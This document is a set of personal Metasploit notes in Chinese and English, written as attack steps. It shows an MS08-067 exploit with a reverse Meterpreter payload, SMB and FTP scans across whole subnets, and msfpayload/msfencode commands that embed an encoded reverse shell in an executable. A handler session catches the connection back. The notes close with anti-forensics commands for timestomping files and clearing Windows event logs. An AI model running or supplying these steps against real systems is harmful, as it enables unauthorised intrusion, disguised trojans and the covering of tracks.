msfconsole example
http://www.nsfocus.net/index.php?act=alert 漏洞列表
http://blog.csdn.net/chence19871/article/details/7415859 安全工具
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.102
RHOST => 192.168.0.102
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.101:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability...
smb_version scan, 用于快速扫描网内的windows主机
msf > use auxiliary/scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(smb_version) > ifconfig | grep inet [*] exec: ifconfig | grep inet inet addr:10.2.3.80 Bcast:10.2.3.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fed2:209e/64 Scope:Link inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host msf auxiliary(smb_version) > set RHOSTS 10.2.3.80/24 RHOSTS => 10.2.3.80/24 msf auxiliary(smb_version) > set THREADS 5 THREADS => 5 msf auxiliary(smb_version) > run [*] 10.2.3.4:445 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:JT-SERVER) (domain:WORKGROUP) [*] 10.2.3.2:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:JB-PC) (domain:WORKGROUP) [*] 10.2.3.14:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:***-PC) (domain:WORKGROUP)
ftp version scan, 只扫ftp服务
msf > use auxiliary/scanner/ftp/ftp_version msf auxiliary(ftp_version) > set RHOSTS 10.1.2.58/24 RHOSTS => 10.1.2.58/24 msf auxiliary(ftp_version) > run [*] 10.1.2.1:21 FTP Banner: '220-Welcome to Pure-FTPd.\x0d\x0a220-You are user number 1 of 5 allowed.\x0d\x0a220-Local time is now 08:44. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a' [*] 10.1.2.11:21 FTP Banner: '220-FileZilla Server version 0.9.40 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a' [*] 10.1.2.14:21 FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a' [*] Scanned 026 of 256 hosts (010% complete)
attach windows 步骤
Step 1. use msfpayload to generate a reverse_tcp payload
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=31336 R | msfencode -t exe -x /root/a.exe -o /tmp/back.exe -e x86/shikata_ga_nai -c 5
Step 2. use msfconsole to open a socket to listen, transfer back.exe to windows and run it
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.0.111 lhost => 192.168.0.111 msf exploit(handler) > set lport 31336 lport => 31336 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.0.111:31336 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 192.168.0.119 [*] Meterpreter session 1 opened (192.168.0.111:31336 -> 192.168.0.119:1070) at 2013-03-17 22:24:56 +0800
db相关,最新版本不再支持mysql和sqlite
msf auxiliary(smb_version) > db_driver [-] The db_driver command is DEPRECATED Because Metasploit no longer supports databases other than the default PostgreSQL, there is no longer a need to set the driver. Thus db_driver is not useful and its functionality has been removed. Usually Metasploit will already have connected to the database; check db_status to see. [*] postgresql connected to msf3dev msf auxiliary(smb_version) > db_status [*] postgresql connected to msf3dev
隐藏踪迹指令在meterpreter下使用
1. timestomp
在meterpreter下用timestomp -b filename
2. run event_manager
run event_manager -c